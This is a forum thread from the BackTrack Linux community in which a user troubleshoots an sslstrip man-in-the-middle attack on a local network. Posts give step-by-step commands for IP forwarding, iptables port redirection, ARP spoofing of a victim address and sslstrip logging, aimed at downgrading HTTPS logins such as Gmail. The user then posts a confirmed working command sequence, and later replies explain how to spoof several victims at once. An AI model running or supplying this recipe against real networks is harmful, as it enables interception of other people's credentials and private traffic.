Page 1 of 2 12 LastLast
Results 1 to 10 of 19

Thread: Sslstrip in a lan - Problems !

  1. #1
    Junior Member
    Join Date
    Jan 2010
    Posts
    31

    Default Sslstrip in a lan - Problems !

    Hi Guys,


    I'm trying to get working sslstrip on my own lan but i encounter some problems.

    Here is my cmds :

    Victim : 192.168.1.37
    Routeur : 192.168.1.1
    Me : 192.168.1.45

    1°)
    Code:
    echo 1 > /proc/sys/net/ipv4/ip_forward
    2°)
    Code:
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
    3°)
    Code:
    arpspoof -i wlan1 -t 192.168.1.37 192.168.1.1
    4°)
    Code:
    ettercap -T -q -p -i wlan1
    5°)
    Code:
    sslstrip -a -k -l 10000
    My victim can surf on the web, but when i try to connect myself to Gmail, it's in HTTPS, not in HTTP or, sometimes, it didn't work at all ...

    Nothing in the sslstrip.log file !

    If someone have an idea, i would be very grateful !

    Carto_

  2. #2
    Just burned his ISO Sparco's Avatar
    Join Date
    Dec 2010
    Location
    Sweden
    Posts
    5

    Default Re: Sslstrip in a lan - Problems !

    http is port 80 and https is port 443 so if i'm right would your iptables command be this?

    iptables -t nat -A PREROUTING -p tcp --destination-port 443 -j REDIRECT --to-port 10000

  3. #3
    Good friend of the forums zimmaro's Avatar
    Join Date
    Mar 2010
    Location
    milano
    Posts
    407

    Default Re: Sslstrip in a lan - Problems !

    you changed the setting of etter.conf ?
    bye

  4. #4
    Junior Member
    Join Date
    Jan 2010
    Posts
    31

    Default Re : Sslstrip in a lan - Problems !

    Of course i did, i already decommented the two lines ... Any other idea (thx for the help !)

  5. #5
    Good friend of the forums comaX's Avatar
    Join Date
    Feb 2010
    Location
    Paris, France
    Posts
    338

    Default Re : Sslstrip in a lan - Problems !

    You don't need ettercap if you're using arpspoof I believe ! I'll make a post about sniffing traffic in a few moments, you might want to check it !
    Running both KDE and GNOME BT5 flawlessly. Thank you !

  6. #6
    Junior Member
    Join Date
    Jan 2010
    Posts
    31

    Default Re : Sslstrip in a lan - Problems !

    Hi Guys,

    I actually find the solution. It appears that Ettercap is usless and harmful for the attack in this case.
    So, you just need that cmd :

    Code:
    arpspoof -t <ipvictim> <ipgateway>
    Code:
    echo -n 1 > /proc/sys/net/ipv4/ip_forward
    Code:
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 1000
    Code:
    python sslstrip.py -a -l 1000 -w test.log -f
    It works for me, thanks for the help !

  7. #7
    Senior Member
    Join Date
    Apr 2006
    Posts
    154

    Default Re: Sslstrip in a lan - Problems !

    Hi Carto
    Just one question...is it possible to have multiple victims or not in arpspoof? (I mean 2 or 3 <ipvictim>)
    Any idea?

  8. #8
    Good friend of the forums comaX's Avatar
    Join Date
    Feb 2010
    Location
    Paris, France
    Posts
    338

    Default Re: Sslstrip in a lan - Problems !

    Quote Originally Posted by michelinok View Post
    Hi Carto
    Just one question...is it possible to have multiple victims or not in arpspoof? (I mean 2 or 3 <ipvictim>)
    Any idea?
    Yes you can, just launch multiple sessions of arpspoof (link below is related)
    http://www.backtrack-linux.org/forum...g-traffic.html
    Running both KDE and GNOME BT5 flawlessly. Thank you !

  9. #9
    Senior Member voidnecron's Avatar
    Join Date
    May 2010
    Posts
    132

    Default Re: Sslstrip in a lan - Problems !

    How did MitM attacks became 'expert topics' in the time between BT4r2 and BT5?
    Anyway Carto, please try this by hand instead of using scripts others wrote until you know what you're doing, which you obviously don't now.
    Until you know what you did/do wrong you shouldn't automate your tests.
    "The difference between RAID1 and RAID0 is that the zero stands for how many files you're gonna have after a harddisk failure."

  10. #10
    Good friend of the forums comaX's Avatar
    Join Date
    Feb 2010
    Location
    Paris, France
    Posts
    338

    Default Re: Sslstrip in a lan - Problems !

    Quote Originally Posted by voidnecron View Post
    How did MitM attacks became 'expert topics' in the time between BT4r2 and BT5?
    Anyway Carto, please try this by hand instead of using scripts others wrote until you know what you're doing, which you obviously don't now.
    Until you know what you did/do wrong you shouldn't automate your tests.
    +1 for expert topics. But I understand since beginners is full of "startx not working"... By the way, I think it's nice the "general topics", and I believe such a topic could belong there.

    I also agree with the fact that before automating, one should know a minimum what he's doing. But everyone learns a different way, and sometimes seeing the bigger picture in a script can help. In this case, since my script explicitly says how it handles multiple targets, I thought it could be helpful !
    Running both KDE and GNOME BT5 flawlessly. Thank you !

Page 1 of 2 12 LastLast

Similar Threads

  1. sslstrip help
    By rogue040 in forum OLD BackTrack 4 Software Related Issues
    Replies: 0
    Last Post: 03-29-2010, 02:42 AM
  2. problems with arpspoof, sslstrip, ettercap
    By username324 in forum Beginners Forum
    Replies: 9
    Last Post: 03-12-2010, 12:02 AM
  3. sslstrip v0.7
    By Mr-Protocol in forum Tool Requests
    Replies: 2
    Last Post: 01-18-2010, 06:33 AM
  4. sslstrip
    By muminrz in forum OLD BT4 Feature Requests
    Replies: 1
    Last Post: 02-28-2009, 03:25 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •